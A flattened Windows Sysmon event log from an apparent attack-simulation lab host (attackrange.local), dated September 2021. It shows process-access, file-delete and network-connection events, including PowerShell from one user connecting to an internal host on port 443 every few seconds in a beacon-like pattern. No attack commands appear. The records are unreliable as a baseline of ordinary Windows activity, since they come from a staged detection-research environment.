13:17:39.318{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497528Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:39.318{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497527Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:39.318{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497526Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:39.318{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497525Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:39.318{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A0F3-6140-8556-04000000C801}720C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497524Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:39.318{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A0F3-6140-8556-04000000C801}720C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497523Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:39.304{B81B27B7-A0F3-6140-8556-04000000C801}720C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497538Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:40.452{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=053BED5C4A8BE1A77FACB3AE38331655,SHA256=1E0933F1059FE85309E9616773E5E22BCC21DEFACFAC525B4FA2AADB3DAC364A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497537Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:40.437{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3E3D7C72CA7B38D0ABF30D4BC28EDB7,SHA256=DA71B6BF782552D30681C4D3F31CB18F51244B58ACC55CCB8E53A6EB0BEC1C04,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497536Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:10.150{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50540-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497539Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:41.469{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=884EA898E14B03794C9867FCE7D7FF5D,SHA256=446FE8A360BAF31ECF3F609BEEB81A0D78DE6023CAEF3DA96F9237BAE32E91EF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497541Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:42.503{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20DBBA8C7350C1B6352FB16EB54C2DD2,SHA256=DBC439FA149E83C0BD31E19EBC309C4E2FDABC8EB43670336AF9F82C0B5D3566,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497540Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:11.936{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50541-false10.0.1.12-8000- 23542300x800000000000000036497543Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:43.549{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2C52F53057B082F62618F6EC2C493D6E,SHA256=7DBC266122710D3A9EB74236C1F0E3C3B34BF454C1A319B2649FF956B4FC4D8E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497542Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:43.533{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93DE402E6458BF050B84454DD61A3535,SHA256=F06BAD93EA3DCF400A027D59A28AA34EA00079127932755495CB7B73F2724E85,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497545Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:44.548{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D85AED58A2B43F8010CD0FC30DCDC20,SHA256=7802DA5CE5F5067FBA611AA99DB06DA4E2C8B9F9467F3D2C2F03F583430F9C64,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497544Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:14.173{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50542-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497546Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:45.565{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCE5F63F1988530615E31CB7ED4B5963,SHA256=8BEB8105F512BD9E8E653B9B1CA4EA70013C6DE9D4A8CD5CA3146BF01F5210EC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497547Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:46.614{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=196FFD2D000C4099DC7C4CD6DF57347E,SHA256=0F7ADD5FF23B3F41C75683CF54F91BB7772C3BA12EC5488F9F744558FC8DF280,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497549Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:47.629{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DDB67CCE323EB88EA8804E09E23E085,SHA256=73F5D58418C0DB629AA125D701A9A5BCED846795C34CEB33DA6EC21A6BE5E5C0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497548Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:17.699{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50543-false10.0.1.12-8000- 23542300x800000000000000036497551Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:48.666{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=ABC4932DE85EE3001B7BC863317C266F,SHA256=0299D382B6CF8AEBF3ADB6BE12CB0E69D3BEAE64D5DA0EE87EA7C8D7C37B7F0B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497550Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:48.662{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BBD04B0D31356D6338FA0ED5405B855,SHA256=187C1B03BB566B27A0ECDD964CB785271C4C54A05CF476806B6255952B5CDD1B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497553Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:49.680{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3418A0F29E3FFA615FBA0B01DD992159,SHA256=B6617A91A8F169898C2AC276B71D3BBFAE901FD50D5349159D14A3D1E3A9FE84,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497552Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:19.198{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50544-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497554Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:50.694{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F42EFA15BF76495C2F9EC37ABBCD245,SHA256=F6E884B33BEE5F1FD0AD8A6D7B37C73AE4D6FDB8F6FB9F3897C7E1E5B271082B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497555Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:51.724{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DC2BDA78D1E3D5533725F012A8D8DA2,SHA256=3A10C5A4C6D7D5A162F289BAE41C84BD4230A145B91C0FF5656BA184F0DC887B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497556Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:52.756{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=851D7162CB199F2A456D64B5C1F1BF68,SHA256=2E4B8518EA4DE7DF6355014852975F8BD74FA04AF1A52E0986BAC19B9DF8BA4C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497559Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:53.791{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02DDC3671944894CA5DDB44B294CB432,SHA256=A580842EA347A6E8447E0F258E92D6CF78629ABB11114F3D205D397A41854CA4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497558Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:53.658{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8118C06C8C10C0BDBFC02A4AC9BADCC5,SHA256=A224CADB8D83E0F731940BAE6ED087EAE191B67C0B18B37E3A458DFBCA47EFFD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497557Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:22.940{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50545-false10.0.1.12-8000- 23542300x800000000000000036497561Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:54.822{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A1D2D46FE7B1DFBAA9CAC9F91185ED1,SHA256=00FA2A638541C7ABCBD09FED5CB00B6366B49C5B4E205322C9CD85B6B2DECCFF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497560Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:24.208{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50546-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497562Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:55.854{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAFC71453D80ED3D68CB243213D0BE22,SHA256=71AA2677266DF4EDE5E100E0F1424637A5C25DB5A7B42B5097C5B89E304DC31C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497564Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:56.856{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9F4FDBA02EE903777699A91AD76BA55,SHA256=94ACEBB81135F86EA35EC4A0B796FD884C8A8166EAA26322574A72E8AFA4A3D2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497563Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:56.288{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF8a333cb7.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497565Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:57.888{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=427EB368789E52017AAE6DE80E79B12B,SHA256=65F8CCF3D7288C6A679364071CF493661211298A962B9138CEFFEB5231B1753B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497567Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:58.902{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B7D6C708467C6CFD065BC58BEEB926C,SHA256=2FCB52CC9F92A26CCC3FFF820631BCC80EB7B85947C1FCA1BE4C3011B1170FE8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497566Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:28.934{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50547-false10.0.1.12-8000- 23542300x800000000000000036497569Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:59.924{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB3BC5C27E592C4E36119F120EC11C2B,SHA256=FF8906E3FE0C1B8C5B52619721566CE5D3EC07736748D9C9810AEADE876CFBC7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497568Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:17:59.577{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C1EAE848D1F1A18D696E009814747DBE,SHA256=719A76441EF854CE2AA62E914B2E18FDE74E1B1FEECCC12120CD5E136AC09078,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497571Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:00.939{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC0A94156899E46ADBBB98FABD923E32,SHA256=4B73F78BFA1BBF56AE68DD42E1F40C7B9BBD922528E55E30FB187AA7EBFEA4DE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497570Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:30.219{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50548-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497572Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:01.955{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=554DA068BC2494BE05971F41A825E6B3,SHA256=A9437CFBFFC3C1E906EAD05BAADA72F2ADD87129D72B6065DCCAE7E12ED9ED40,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497573Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:02.974{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F4320F39275BABE6DD0F24B4F6E4F7C,SHA256=9F8AB3EF3AF272401408D68C9944EB3B69BA7CA6F677BA6F55547F06A2915EC0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497574Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:18:03.988{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52E0EC2976E34E07BC86CA12B86E2A69,SHA256=FF22713F7219C8A07BC27F0300D768E0A545D127FB7D1FF6DE8E3BB9BB1EDC0C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 